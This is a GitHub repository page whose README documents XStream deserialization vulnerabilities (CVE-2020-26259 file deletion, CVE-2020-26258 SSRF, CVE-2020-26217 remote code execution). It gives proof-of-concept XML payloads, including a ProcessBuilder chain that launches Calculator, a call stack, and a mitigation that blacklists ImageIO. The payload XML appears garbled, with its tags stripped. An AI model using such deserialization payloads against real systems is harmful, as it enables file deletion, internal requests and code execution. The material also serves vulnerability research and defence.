https://github.com/jas502n/CVE-2020-26259

CVE-2020-26259: XStream is vulnerable to an Arbitrary File Deletion on the local host when unmarshalling as long as the executing process has sufficient rights.
https://github.com/jas502n/CVE-2020-26259

Last synced: about 1 month ago
JSON representation

CVE-2020-26259: XStream is vulnerable to an Arbitrary File Deletion on the local host when unmarshalling as long as the executing process has sufficient rights.

• Host: GitHub
• URL: https://github.com/jas502n/CVE-2020-26259
• Owner: jas502n
• Created: 2020-12-13T17:39:11.000Z (almost 4 years ago)
• Default Branch: main
• Last Pushed: 2020-12-13T19:12:34.000Z (almost 4 years ago)
• Last Synced: 2024-05-02T18:08:50.694Z (5 months ago)
• Language: Java
• Size: 1.48 MB
• Stars: 27
• Watchers: 1
• Forks: 1
• Open Issues: 0
• Metadata Files:
  • Readme: README.md

Awesome Lists containing this project

• awesome-hacking-lists - jas502n/CVE-2020-26259 - CVE-2020-26259: XStream is vulnerable to an Arbitrary File Deletion on the local host when unmarshalling as long as the executing process has sufficient rights. (Java)

README

        
# CVE-2020-26259

CVE-2020-26259: XStream(1.4.14) is vulnerable to an Arbitrary File Deletion on the local host when unmarshalling as long as the executing process has sufficient rights.

https://x-stream.github.io/CVE-2020-26259.html

**XStream 1.4.14**

![](./CVE-2020-26259.png)

#### pom.xml

```

    

    

        

            com.thoughtworks.xstream

            xstream

            1.4.14

        

    

```

## poc

https://x-stream.github.io/CVE-2020-26259.html

```

  

    

      0

      

        

          

            text/plain

            

              /etc/hosts

            

          

          

        

        0

      

    

    test

  

```

# CVE-2020-26258

CVE-2020-26258: A Server-Side Forgery Request can be activated unmarshalling with XStream(1.4.14) to access data streams from an arbitrary URL referencing a resource in an intranet or the local host.

https://x-stream.github.io/CVE-2020-26258.html

#### POC

```

  

    

      0

      

        

          

            http://localhost:8080/internal/:

          

          

        

        0

      

    

    test

  

```

# CVE-2020-26217

CVE-2020-26217: XStream (1.4.13) can be used for Remote Code Execution.

https://x-stream.github.io/CVE-2020-26217.html

![](./CVE-2020-26217.png)

#### pom.xml

```

    

    

        

            com.thoughtworks.xstream

            xstream

            1.4.13

        

    

```

#### POC

**Command:** `open -a /Applications/Calculator.app`

```

  

    

      0

      

        

          

            text/plain

            

              

                

                  

                    0

                    -1

                    1

                    

                      

                        

                          open

                          -a

                          /Applications/Calculator.app

                        

                      

                    

                  

                  

                    

                      java.lang.ProcessBuilder

                      start

                      

                    

                    start

                  

                  

                

                KEYS

              

              

                

                0

                0

                0

              

            

            false

          

          

        

        0

      

    

    test

  

```

#### 调用栈

```

start:1007, ProcessBuilder (java.lang)

invoke0:-1, NativeMethodAccessorImpl (sun.reflect)

invoke:62, NativeMethodAccessorImpl (sun.reflect)

invoke:43, DelegatingMethodAccessorImpl (sun.reflect)

invoke:497, Method (java.lang.reflect)

filter:613, ImageIO$ContainsFilter (javax.imageio)

advance:821, FilterIterator (javax.imageio.spi)

next:839, FilterIterator (javax.imageio.spi)

nextElement:153, MultiUIDefaults$MultiUIDefaultsEnumerator (javax.swing)

nextStream:110, SequenceInputStream (java.io)

read:211, SequenceInputStream (java.io)

readFrom:65, ByteArrayOutputStreamEx (com.sun.xml.internal.bind.v2.util)

get:182, Base64Data (com.sun.xml.internal.bind.v2.runtime.unmarshaller)

toString:286, Base64Data (com.sun.xml.internal.bind.v2.runtime.unmarshaller)

getStringValue:122, NativeString (jdk.nashorn.internal.objects)

hashCode:118, NativeString (jdk.nashorn.internal.objects)

hash:338, HashMap (java.util)

put:611, HashMap (java.util)

putCurrentEntryIntoMap:107, MapConverter (com.thoughtworks.xstream.converters.collections)

populateMap:98, MapConverter (com.thoughtworks.xstream.converters.collections)

populateMap:92, MapConverter (com.thoughtworks.xstream.converters.collections)

unmarshal:87, MapConverter (com.thoughtworks.xstream.converters.collections)

convert:72, TreeUnmarshaller (com.thoughtworks.xstream.core)

convert:72, AbstractReferenceUnmarshaller (com.thoughtworks.xstream.core)

convertAnother:66, TreeUnmarshaller (com.thoughtworks.xstream.core)

convertAnother:50, TreeUnmarshaller (com.thoughtworks.xstream.core)

start:134, TreeUnmarshaller (com.thoughtworks.xstream.core)

unmarshal:32, AbstractTreeMarshallingStrategy (com.thoughtworks.xstream.core)

unmarshal:1404, XStream (com.thoughtworks.xstream)

unmarshal:1383, XStream (com.thoughtworks.xstream)

fromXML:1268, XStream (com.thoughtworks.xstream)

fromXML:1259, XStream (com.thoughtworks.xstream)

main:61, Main

```

## 黑名单 /javax/imageio/ImageIO.java

```

XStream xstream = new XStream();

xstream.addPermission(NoTypePermission.NONE);

// 首先清除默认设置，然后进行自定义设置

xstream.denyPermission(new ExplicitTypePermission(new Class[]{ImageIO.class}));

//将ImageIO类加入黑名单

xstream.fromXML(xml);

```

##参考链接

https://www.cnblogs.com/v1ntlyn/p/14034019.html